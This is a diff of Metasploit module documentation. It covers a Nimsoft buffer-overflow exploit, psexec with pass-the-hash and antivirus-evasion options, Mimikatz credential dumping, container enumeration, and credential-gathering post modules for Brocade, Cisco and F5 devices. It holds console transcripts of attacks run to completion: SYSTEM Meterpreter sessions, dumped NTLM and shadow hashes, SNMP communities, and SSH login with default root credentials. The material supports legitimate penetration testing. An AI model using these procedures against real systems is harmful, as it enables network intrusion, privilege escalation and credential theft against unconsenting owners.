+[*] Meterpreter session 1 opened (A.B.C.D:8443 -> W.X.Y.Z:50980) at 2020-07-21 11:14:09 -0500
+[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun  1 2015] detected, sending directory_list probe
+
+ Directory of C:\
+
+ 12/15/2019 06:24 PM  <DIR> $GetCurrent
+ 12/14/2019 01:41 AM  <DIR> $Recycle.Bin
+ 10/18/2019 05:55 PM  <DIR> Documents and Settings
+ 07/21/2020 10:15 AM  <DIR> pagefile.sys
+ 07/14/2020 03:41 PM  <DIR> PerfLogs
+ 06/10/2020 09:18 AM  <DIR> Program Files
+ 07/19/2020 01:37 PM  <DIR> Program Files (x86)
+ 07/14/2020 03:41 PM  <DIR> ProgramData
+ 12/15/2019 07:08 PM  <DIR> Recovery
+ 07/21/2020 10:15 AM  <DIR> swapfile.sys
+ 10/18/2019 04:04 PM  <DIR> System Volume Information
+ 12/15/2019 07:09 PM  <DIR> Users
+ 07/18/2020 02:20 PM  <DIR> Windows
+
+[+] W.X.Y.Z:48000 - The target is vulnerable.
+
+meterpreter >
+[*] Session ID 1 (A.B.C.D:8443 -> W.X.Y.Z:50980) processing AutoRunScript 'post/windows/manage/migrate'
+[*] Running module against DESKTOP-JICNNRT
+[*] Current server process: notepad.exe (1860)
+[*] Spawning notepad.exe process to migrate into
+[*] Spoofing PPID 0
+[*] Migrating into 7472
+[+] Successfully migrated into process 7472
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\
+DIRECTORY => C:\Users\
+msf5 exploit(windows/nimsoft/nimcontroller_bof) > check
+
+[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun  1 2015] detected, sending directory_list probe
+
+ Directory of C:\Users\
+
+ 03/19/2019 12:02 AM  <DIR> All Users
+ 12/15/2019 07:14 PM  <DIR> Default
+ 03/19/2019 12:02 AM  <DIR> Default User
+ 03/18/2019 11:49 PM  <DIR> desktop.ini
+ 07/19/2020 01:37 PM  <DIR> REDACTED
+ 12/15/2019 09:07 PM  <DIR> Public
+
+[+] W.X.Y.Z:48000 - The target is vulnerable.
+```
@@ -1,17 +1,16 @@
-psexec is one of the most popular exploits against Microsoft Windows. It is a great way to test password security and demonstrate how a stolen password could lead to a complete compromise of an entire corporate network.
-
-The Metasploit Framework actually includes different module types of psexec for different scenarios. exploit/windows/smb/psexec is the father of them all and is used the same way
-you normally would with any Metasploit exploits.
-
-
 ## Vulnerable Application
+PsExec is one of the most popular exploits against Microsoft Windows. It is a great way to test password security and demonstrate how a
+stolen password could lead to a complete compromise of an entire corporate network.

-To be able to use exploit/windows/smb/psexec:
+To be able to use `exploit/windows/smb/psexec`:

-1. You must have a valid username/password.
-2. The firewall must allow SMB traffic.
-3. The target must use SMBv1.
-4. The remote Windows machine's network security policy must allow it. If you see [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), then the Windows machine does not allow it.
+1. A valid username and password must be set.
+1. The firewall must allow SMB traffic.
+1. The remote Windows machine's network security policy must allow it.
+    * If the specified account is a local Administrator and the target is Windows Vista or newer, then "Remote UAC" must be disabled (the
+      `DWORD` value `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy` must be 1).
+      See [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy][1] for more information. Without this setting, the server will
+      respond with `STATUS_ACCESS_DENIED` and PsExec will fail.

 ## Verification Steps

@@ -43,7 +42,8 @@ meterpreter >

 ## Options

-By default, using exploit/windows/smb/psexec can be as simple as setting the RHOST option, and you're ready to go. But in reality, you will probably need to at least configure:
+By default, using exploit/windows/smb/psexec can be as simple as setting the RHOST option, and you're ready to go. But in reality, you will
+probably need to at least configure:

 **The SMBUser Option**

@@ -58,7 +58,8 @@ This can be either the plain text version or the Windows hash.

 **Pass the Hash**

-One common penetration testing scenario using psexec is that attackers usually begin by breaking into a box, dumping the hashes, and using some of those hashes to log into other boxes on the network using psexec. So in that scenario, with the following stolen hash:
+One common penetration testing scenario using psexec is that attackers usually begin by breaking into a box, dumping the hashes, and using
+some of those hashes to log into other boxes on the network using psexec. So in that scenario, with the following stolen hash:

 ```
 meterpreter > hashdump
@@ -93,28 +94,46 @@ meterpreter >

 **Automatic Target**

-There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
+There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target
+detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natie upload. Each target is explained below.

 **Powershell Target**

-The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default.
+The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not
+leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by
+default.

-Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that.
+Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports
+Powershell before it tries it; the manually set Powershell target won't do that.

 **Native Upload Target**

 The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the
 SHARE datastore option), and then execute it with psexec.

-This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option.
+This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to
+use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the
+`EXE::Custom` option.

 **MOF Upload Target**

-The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
-format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session.
+The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target
+technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload
+(exe) in SYSTEM32 and a managed object format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it
+automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get
+a session.

-Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting
-caught by antivirus on the target.
+Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to
+disk, there is also a high chance of getting caught by antivirus on the target.

-The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option.
+The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template
+datastore options or you can supply your own custom EXE by setting the EXE::Custom option.

+**Command**
+
+The command target causes the psexec operation to execute an operating system command. This can either be a `cmd/windows/` payload provided
+by Metasploit, or the user can specify their own by using the `cmd/windows/generic` payload and setting `CMD`. The output of the command
+will be written to a file and then retrieved so that it is accessible. If the command does not immediately return, then reading the output
+will fail.
+
+[1]: https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/
@@ -9,13 +9,13 @@ files, as well as instructions on installing/configuring the environment if it i
 standard install. Much of this will come from the PR, and can be copy/pasted.

 ## Verification Steps
-  Example steps in this format (is also in the PR):
+Example steps in this format (is also in the PR):

-  1. Install the application
-  2. Start msfconsole
-  3. Do: ```use [module path]```
-  4. Do: ```run```
-  5. You should get a shell.
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `run`
+1. You should get a shell.

 ## Options
 List each option and how to use it.
@@ -27,19 +27,18 @@ Talk about what it does, and how to use it appropriately. If the default value i
 ## Scenarios
 Specific demo of using the module that might be useful in a real world scenario.

-
 ### Version and OS

-  ```
-  code or console output
-  ```
+```
+code or console output
+```

-  For example:
+For example:

-  To do this specific thing, here's how you do it:
+To do this specific thing, here's how you do it:

-  ```
-  msf > use module_name
-  msf auxiliary(module_name) > set POWERLEVEL >9000
-  msf auxiliary(module_name) > exploit
-  ```
+```
+msf > use module_name
+msf auxiliary(module_name) > set POWERLEVEL >9000
+msf auxiliary(module_name) > exploit
+```
@@ -327,56 +327,6 @@ the specific post module you wish to run, and enter ```info -d``` to see the bas
 documentation.


-**Using the Mimikatz Extension**
-
-[Mimikatz](https://github.com/gentilkiwi/mimikatz) is a well known tool to extract passwords, hashes, PIN code, and kerberos tickets from memory on Windows. This might actually be the first thing you want to use as soon as you get a high-privileged session, such as SYSTEM.
-
-To begin, load the extension:
-
-```
-meterpreter > load mimikatz
-Loading extension mimikatz...success.
-meterpreter >
-```
-
-This will create more commands for the Meterpreter prompt. Most of them are meant to be used to
-retrieve user names, hashes, passwords and other information:
-
-```
-Mimikatz Commands
-=================
-
-    Command           Description
-    -------           -----------
-    kerberos          Attempt to retrieve kerberos creds
-    livessp           Attempt to retrieve livessp creds
-    mimikatz_command  Run a custom command
-    msv               Attempt to retrieve msv creds (hashes)
-    ssp               Attempt to retrieve ssp creds
-    tspkg             Attempt to retrieve tspkg creds
-    wdigest           Attempt to retrieve wdigest creds
-```
-
-An example of using the ```msv``` command:
-
-```
-meterpreter > msv
-[+] Running as SYSTEM
-[*] Retrieving msv credentials
-msv credentials
-===============
-
-AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
-0;313876  NTLM       WIN-6NH0Q8CJQVM  user10            lm{ 0363cb92c563245c447eaf70cfac29c1 }, ntlm{ 16597a07ce66307b3e1a5bd1b7abe123 }
-0;313828  NTLM       WIN-6NH0Q8CJQVM  user10            lm{ 0363cb92c563245c447eaf70cfac29c1 }, ntlm{ 16597a07ce66307b3e1a5bd1b7abe123 }
-0;996     Negotiate  WORKGROUP        WIN-6NH0Q8CJQVM$  n.s. (Credentials KO)
-0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
-0;45518   NTLM                                          n.s. (Credentials KO)
-0;999     NTLM       WORKGROUP        WIN-6NH0Q8CJQVM$  n.s. (Credentials KO)
-```
-
-
 **Using the extapi Extension**

 The main purpose of the extapi extension is to perform advanced enumeration of the target machine. For
@@ -0,0 +1,151 @@
+## Container Platforms
+
+This module looks for container platforms running on the target and then lists any currently running containers for each platform found. The currently supported container platforms are:
+  
+  1. Docker
+  2. LXC
+  3. RKT
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a session via exploit of your choice
+  3. Load the module `use post/linux/gather/enum_containers`
+  4. Set the session `set session 1`
+  5. run the module `run`
+  6. You should get feedback if any container platforms are runnable by the current user and if there are any active containers running on them
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions -l`
+ 
+  **CMD**
+
+  Optional shell command to run on each running container
+
+## Scenarios
+
+Scenario 1: Docker is installed with 4 running containers
+```
+msf5 post(linux/gather/enum_containers) > set session 4
+session => 4
+msf5 post(linux/gather/enum_containers) > run
+
+[+] docker was found on the system!
+[+] docker: 1 Running Containers / 5 Total
+CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS                         PORTS               NAMES
+853913ae1e17        nginx               "/docker-entrypoint.…"   About an hour ago   Up About an hour               80/tcp              lucid_tu
+0422ad0a1d6e        nginx               "/docker-entrypoint.…"   About an hour ago   Exited (0) About an hour ago                       gifted_thompson
+35930fd284e1        nginx               "/docker-entrypoint.…"   2 days ago          Exited (0) 5 hours ago                             unruffled_gates
+a7149a9a858e        nginx               "/docker-entrypoint.…"   2 days ago          Exited (127) 2 days ago                            pedantic_tesla
+cfa40ec4d85c        nginx               "/docker-entrypoint.…"   2 days ago          Exited (0) 2 days ago                              fervent_gates
+[+] Results stored in: /home/gwillcox/.msf4/loot/20200805143522_default_172.27.129.4_host.docker_cont_134332.txt
+[*] Post module execution completed
+```
+
+Scenario 2: Docker, LXC and RKT are installed, and each of them are running their own containers
+```
+msf5 post(linux/gather/enum_containers) > set session 2
+session => 2
+msf5 post(linux/gather/enum_containers) > exploit
+
+[+] docker was found on the system!
+[+] docker: 1 Running Containers / 5 Total
+CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS                         PORTS               NAMES
+853913ae1e17        nginx               "/docker-entrypoint.…"   About an hour ago   Up About an hour               80/tcp              lucid_tu
+0422ad0a1d6e        nginx               "/docker-entrypoint.…"   About an hour ago   Exited (0) About an hour ago                       gifted_thompson
+35930fd284e1        nginx               "/docker-entrypoint.…"   2 days ago          Exited (0) 5 hours ago                             unruffled_gates
+a7149a9a858e        nginx               "/docker-entrypoint.…"   2 days ago          Exited (127) 2 days ago                            pedantic_tesla
+cfa40ec4d85c        nginx               "/docker-entrypoint.…"   2 days ago          Exited (0) 2 days ago                              fervent_gates
+[+] Results stored in: /home/gwillcox/.msf4/loot/20200805193841_default_172.27.129.4_host.docker_cont_169517.txt
+
+[+] lxc was found on the system!
+[+] lxc: 1 Running Containers / 1 Total
+NAME    STATE   IPV4                 IPV6                                         TYPE      SNAPSHOTS
+one-fox RUNNING 10.166.198.97 (eth0) fd42:a29:a47e:79c6:216:3eff:fe1f:1dca (eth0) CONTAINER 0
+[+] Results stored in: /home/gwillcox/.msf4/loot/20200805193842_default_172.27.129.4_host.lxc_contain_448673.txt
+
+[+] rkt was found on the system!
+[+] rkt: 2 Running Containers / 1 Total
+UUID            APP     IMAGE NAME              STATE           CREATED         STARTED         NETWORKS
+1f5f73a2        etcd    coreos.com/etcd:v3.1.7  running         32 minutes ago  32 minutes ago  default:ip4=172.16.28.3
+384c8a25        etcd    coreos.com/etcd:v3.1.7  exited garbage  4 hours ago     4 hours ago     default:ip4=172.16.28.2
+[+] Results stored in: /home/gwillcox/.msf4/loot/20200805193842_default_172.27.129.4_host.rkt_contain_801968.txt
+
+[*] Post module execution completed
+msf5 post(linux/gather/enum_containers) >
+
+Scenario 3: No container software is runnable
+```
+msf5 post(linux/gather/enum_containers) > set session 6
+session => 6
+msf5 post(linux/gather/enum_containers) > run
+[-] No container software appears to be installed or runnable by the current user
+[*] Post module execution completed
+```
+
+Scenario 4: List all containers and execute the `env` command on all running containers
+```
+msf5 post(linux/gather/enum_containers) > set session 6
+session => 6
+msf5 post(linux/gather/enum_containers) > set CMD "env"
+CMD => env
+msf5 post(linux/gather/enum_containers) > run
+
+[+] docker was found on the system!
+[+] docker: 1 Running Containers / 5 Total
+CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS                    PORTS               NAMES
+853913ae1e17        nginx               "/docker-entrypoint.…"   2 hours ago         Up 2 hours                80/tcp              lucid_tu
+0422ad0a1d6e        nginx               "/docker-entrypoint.…"   2 hours ago         Exited (0) 2 hours ago                        gifted_thompson
+35930fd284e1        nginx               "/docker-entrypoint.…"   2 days ago          Exited (0) 6 hours ago                        unruffled_gates
+a7149a9a858e        nginx               "/docker-entrypoint.…"   2 days ago          Exited (127) 2 days ago                       pedantic_tesla
+cfa40ec4d85c        nginx               "/docker-entrypoint.…"   2 days ago          Exited (0) 2 days ago                         fervent_gates
+[+] Results stored in: /home/gwillcox/.msf4/loot/20200805202620_default_172.27.129.4_host.docker_cont_406553.txt
+
+[*] Executing command on docker container lucid_tu
+[+] PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+HOSTNAME=853913ae1e17
+NGINX_VERSION=1.19.1
+NJS_VERSION=0.4.2
+PKG_RELEASE=1~buster
+HOME=/root
+[+] lxc was found on the system!
+[+] lxc: 1 Running Containers / 1 Total
+NAME    STATE   IPV4                 IPV6                                         TYPE      SNAPSHOTS
+one-fox RUNNING 10.166.198.97 (eth0) fd42:a29:a47e:79c6:216:3eff:fe1f:1dca (eth0) CONTAINER 0
+[+] Results stored in: /home/gwillcox/.msf4/loot/20200805202623_default_172.27.129.4_host.lxc_contain_977736.txt
+
+[*] Executing command on lxc container one-fox
+[+] PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
+container=lxc
+HOME=/root
+USER=root
+LANG=C.UTF-8
+[+] rkt was found on the system!
+[+] rkt: 2 Running Containers / 1 Total
+UUID            APP     IMAGE NAME              STATE           CREATED         STARTED         NETWORKS
+1f5f73a2        etcd    coreos.com/etcd:v3.1.7  running         1 hour ago      1 hour ago      default:ip4=172.16.28.3
+384c8a25        etcd    coreos.com/etcd:v3.1.7  exited garbage  5 hours ago     5 hours ago     default:ip4=172.16.28.2
+[+] Results stored in: /home/gwillcox/.msf4/loot/20200805202625_default_172.27.129.4_host.rkt_contain_522670.txt
+
+[*] Executing command on rkt container 1f5f73a2
+[-] RKT containers do not support command execution
+Use rkt enter '1f5f73a2' to manually enumerate this container
+[+] USER=root
+HOME=/root
+PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
+LANG=C
+PWD=/home/gwillcox/git/metasploit-framework
+[*] Executing command on rkt container 384c8a25
+[-] RKT containers do not support command execution
+Use rkt enter '384c8a25' to manually enumerate this container
+[+] USER=root
+HOME=/root
+PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
+LANG=C
+PWD=/home/gwillcox/git/metasploit-framework
+[*] Post module execution completed
+msf5 post(linux/gather/enum_containers) >
+```
@@ -1,33 +1,36 @@
 ## Vulnerable Application

-  This module has been tested on the following hardware/OS combinations.
+This module has been tested on the following hardware/OS combinations.

-  * Brocade ICX 6430-24
-    * Firmware: 08.0.20T311
+* Brocade ICX 6430-24
+  * Firmware: 08.0.20T311

-  The ICX config can be found [no passwords](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_icx6430_nopass.conf), 
-  [hashes](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_icx6430_pass.conf)
+The ICX config can be found [no passwords](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_icx6430_nopass.conf),
+[hashes](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_icx6430_pass.conf)

-  This module will look for the follow parameters which contain credentials:
+This module will look for the following parameters which contain credentials:

-  * FastIron
-    * `show configuration`
+* FastIron
+  * `show configuration`

-!!! keep in mind 'password-display' http://wwwaem.brocade.com/content/html/en/command-reference-guide/fastiron-08040-commandref/GUID-169889CD-1A74-4A23-AC78-38796692374F.html
+!!! keep in mind 'password-display'
+http://wwwaem.brocade.com/content/html/en/command-reference-guide/fastiron-08040-commandref/GUID-169889CD-1A74-4A23-AC78-38796692374F.html
 !!! need to be able to give a password to enable

-    * super-user-password
-    * username
-    * SNMP
+  * super-user-password
+  * username
+  * SNMP

 ## Verification Steps

-  1. Start msfconsole
-  2. Get a shell
-  3. Do: ```use post/brocade/gather/enum_brocade```
-  4. Do: ```set session [id]```
-  5. Do: ```set verbose true```
-  6. Do: ```run```
+1. Start msfconsole
+2. Get a shell
+3. Do: ```use post/networking/gather/enum_brocade```
+4. Do: ```set session [id]```
+5. Do: ```set verbose true```
+6. Do: ```run```
+
+## Options

 ## Scenarios

@@ -36,7 +39,7 @@
 #### SSH Session with password-display off

 ```
-resource (brocade.rb)> use post/brocade/gather/enum_brocade
+resource (brocade.rb)> use post/networking/gather/enum_brocade
 resource (brocade.rb)> set session 1
 session => 1
 resource (brocade.rb)> set verbose true
@@ -51,14 +54,15 @@ resource (brocade.rb)> run
 [*] Post module execution completed
 ```

-#### SSH Session with Enable run 
+#### SSH Session with Enable run

 ```
-resource (brocade.rb)> use post/brocade/gather/enum_brocade
+resource (brocade.rb)> use post/networking/gather/enum_brocade
 resource (brocade.rb)> set session 1
 session => 1
 resource (brocade.rb)> set verbose true
 verbose => true
+resource (brocade.rb)> run
 [*] In an enabled cli
 [*] Getting version information
 [*] OS: 08.0.30hT311
@@ -70,7 +74,7 @@ verbose => true
 [+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro
 [+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw
 [*] Post module execution completed
-msf5 post(brocade/gather/enum_brocade) > loot
+msf5 post(networking/gather/enum_brocade) > loot

 Loot
 ====
@@ -80,7 +84,7 @@ host       service  type             name         content     info
 10.0.4.51           brocade.version  version.txt  text/plain  Brocade Version        /root/.msf4/loot/20190601221959_default_10.0.4.51_brocade.version_003751.txt
 10.0.4.51           brocade.config   config.txt   text/plain  Brocade Configuration  /root/.msf4/loot/20190601222004_default_10.0.4.51_brocade.config_998514.txt

-msf5 post(brocade/gather/enum_brocade) > creds
+msf5 post(networking/gather/enum_brocade) > creds
 Credentials
 ===========

@@ -1,36 +1,38 @@
 ## Vulnerable Application

-  This module has been tested on the following hardware/OS combinations.
+This module has been tested on the following hardware/OS combinations.

-  * IOS
-    * Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13
-    * UC520, UC520-8U-4FXO-K9, Version 12.4(20)T2
+* IOS
+  * Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13
+  * UC520, UC520-8U-4FXO-K9, Version 12.4(20)T2

-  The Catalyst 2950 config can be found [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/cisco-2950.config)
+The Catalyst 2950 config can be found [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/cisco-2950.config)

-  The UC520 config can be found [here](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/cisco-uc520.config)
+The UC520 config can be found [here](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/cisco-uc520.config)

-  This module will look for the follow parameters which contain credentials:
+This module will look for the following parameters which contain credentials:

-  * IOS
-    * enable
-    * snmp-server
-    * VTY
-    * WiFi
-    * VPN
-    * username
-    * PPP
-    * web admin
+* IOS
+  * enable
+  * snmp-server
+  * VTY
+  * WiFi
+  * VPN
+  * username
+  * PPP
+  * web admin

 ## Verification Steps

  1. Start msfconsole
  2. Get a shell
-  3. Do: ```use post/cisco/gather/enum_cisco```
+  3. Do: ```use post/networking/gather/enum_cisco```
  4. Do: ```set session [id]```
  5. Do: ```set verbose true```
  6. Do: ```run```

+## Options
+
 ## Scenarios

 ### Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13
@@ -48,7 +50,7 @@ resource (cisco.rb)> run
 [*] Command shell session 1 opened (111.111.1.111:40721 -> 222.222.2.222:22) at 2019-07-20 16:29:05 -0400
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-resource (cisco.rb)> use post/cisco/gather/enum_cisco
+resource (cisco.rb)> use post/networking/gather/enum_cisco
 resource (cisco.rb)> set session 1
 session => 1
 resource (cisco.rb)> set verbose true
@@ -82,7 +84,7 @@ resource (cisco.rb)> run
 [+] Saving to /root/.msf4/loot/20190720163006_default_222.222.2.222_cisco.ios.cdp_ne_989308.txt
 [*] Post module execution completed
 [*] Starting persistent handler(s)...
-msf5 post(cisco/gather/enum_cisco) > creds
+msf5 post(networking/gather/enum_cisco) > creds
 Credentials
 ===========

@@ -111,7 +113,7 @@ resource (cisco.rb)> run
 [*] Command shell session 1 opened (111.111.1.111:41839 -> 222.222.2.222:22) at 2019-07-21 16:24:02 -0400
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-resource (cisco.rb)> use post/cisco/gather/enum_cisco
+resource (cisco.rb)> use post/networking/gather/enum_cisco
 resource (cisco.rb)> set session 1
 session => 1
 resource (cisco.rb)> set verbose true
@@ -151,7 +153,7 @@ resource (cisco.rb)> run
 [+] Saving to /root/.msf4/loot/20190721162508_default_222.222.2.222_cisco.ios.cdp_ne_405367.txt
 [*] Post module execution completed
 [*] Starting persistent handler(s)...
-msf5 post(cisco/gather/enum_cisco) > creds
+msf5 post(networking/gather/enum_cisco) > creds
 Credentials
 ===========

@@ -168,4 +170,3 @@ host           origin         service  public      private
 222.222.2.222  222.222.2.222  161/udp              public                                 Password            
 222.222.2.222  222.222.2.222  22/tcp               $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1         Nonreplayable hash  md5
 ```
-
@@ -0,0 +1,105 @@
+## Vulnerable Application
+
+This module has been tested on the following hardware/OS combinations.
+
+* F5 Big-IP 15.1.0.2
+
+This module will look for the following parameters which contain credentials:
+
+* Big-IP
+  * user
+  * SNMP
+  * key hashes
+  * SSL keys
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a shell
+1. Do: `use post/networking/gather/enum_f5`
+1. Do: `set session [id]`
+1. Do: `set verbose true`
+1. Do: `run`
+
+## Options
+
+## Scenarios
+
+### F5 Big-IP 15.1.0.2
+
+```
+resource (f5_ssh.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (f5_ssh.rb)> set username root
+username => root
+resource (f5_ssh.rb)> set password f5-bigip
+password => f5-bigip
+resource (f5_ssh.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (f5_ssh.rb)> run
+[+] 2.2.2.2:22 - Success: 'root:f5-bigip' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux f5bigip.ragedomain 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Fri Mar 20 17:06:49 PDT 2020 x86_64 x86_64 x86_64 GNU/Linux '
+[*] Command shell session 1 opened (1.1.1.1:42443 -> 2.2.2.2:22) at 2020-08-20 14:39:08 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+```
+resource (f5_ssh.rb)> use post/networking/gather/enum_f5
+resource (f5_ssh.rb)> set session 1
+session => 1
+resource (f5_ssh.rb)> set verbose true
+verbose => true
+resource (f5_ssh.rb)> run
+[!] SESSION may not be compatible with this module.
+[*] Moving to TMOS prompt
+[+] Config information stored in to loot /home/h00die/.msf4/loot/20200820143924_default_2.2.2.2_f5.version_351096.txt
+[+] Version: BIG-IP 15.1.0.2 0.0.9
+[*] Gathering info from show sys
+[+] Saving to /home/h00die/.msf4/loot/20200820143929_default_2.2.2.2_F5.show_sys_066269.txt
+[+] 2.2.2.2:22 F5 master-key hash EFt+B7/aTWwPwLoMd8KLYW4JB3K5B6301k4pGsoWnZEb2yUbvEJgNU3FcLHo0S4QvdrwVcKrNtHLzebC7HizHQ==
+[+] 2.2.2.2:22 F5 previous hash EFt+B7/aTWwPwLoMd8KLYW4JB3K5B6301k4pGsoWnZEb2yUbvEJgNU3FcLHo0S4QvdrwVcKrNtHLzebC7HizHQ==
+[*] Gathering info from show auth
+[+] Saving to /home/h00die/.msf4/loot/20200820143934_default_2.2.2.2_F5.show_auth_823862.txt
+[*] Gathering info from show cm
+[+] Saving to /home/h00die/.msf4/loot/20200820143939_default_2.2.2.2_F5.show_cm_704510.txt
+[*] Gathering info from show net
+[+] Saving to /home/h00die/.msf4/loot/20200820143944_default_2.2.2.2_F5.show_net_045166.txt
+[*] Gathering info from show running-config
+[+] Saving to /home/h00die/.msf4/loot/20200820143949_default_2.2.2.2_F5.show_running__097351.txt
+[+] 2.2.2.2:22 Username 'admin' with description 'Admin User' and shell tmsh with hash $6$PQvaMmyS$Bn5.2qIin7rC34tHUQ1Vu6fEeuDzQZqc25TSiDsmbB903RENBisWbTN9Mqh7g2x26VUbxdzwUzzmL7fB4T2iy1
+[+] 2.2.2.2:22 Username 'superlegit' with description 'a user account' and shell tmsh with hash $6$FTQz2reX$U0o37QjQYdg42dwCcLa.1H85hVTriQtxhlMoIM0cs4DFyW5s26kbrEgZG5Mfaxi9fgFfHrvDBGad7ikXnEZIP0
+[+] 2.2.2.2:22 Username 't' with description 't' and shell none with hash $6$iajXIq2B$ezy4hVW9A.5eN1xG4JZWFbY4bFaq7uUKwO9gDVLxvgzigsX4gquLW1NoSaZP9CtN0NnrbGV4QvtkA.esLJOg50
+[+] 2.2.2.2:22 SNMP Community 'public' with RO access
+[+] 2.2.2.2:22 SNMP Community 'rocommunity' with RO access
+[+] 2.2.2.2:22 SNMP Community 'rwcommunity' with RW access
+[+] 2.2.2.2:22 Hostname: f5bigip.ragedomain
+[+] 2.2.2.2:22 MAC Address: 00:0c:29:18:49:c7
+[+] 2.2.2.2:22 Management IP: 2.2.2.2
+[+] 2.2.2.2:22 Product BIG-IP
+[+] 2.2.2.2:22 OS Version: 15.1.0.2
+[+] 2.2.2.2:22 SSL Key 'f5_api_com.key' and hash $M$by$gXTDo23Gz+Yz4fWA4uBbTccd+oD1pdsXJbwhvhMPiss4Iw0RKIJQS/CuSReZl/+kseKpPCNpBWNWOOaBCwlQ0v4sl7ZUkxCymh5pfFNAjhc= for /config/ssl/ssl.key/f5_api_com.key
+[*] Gathering info from show sys crypto master-key
+[+] Saving to /home/h00die/.msf4/loot/20200820143954_default_2.2.2.2_F5.show_crypto_k_313673.txt
+[+] 2.2.2.2:22 F5 master-key hash EFt+B7/aTWwPwLoMd8KLYW4JB3K5B6301k4pGsoWnZEb2yUbvEJgNU3FcLHo0S4QvdrwVcKrNtHLzebC7HizHQ==
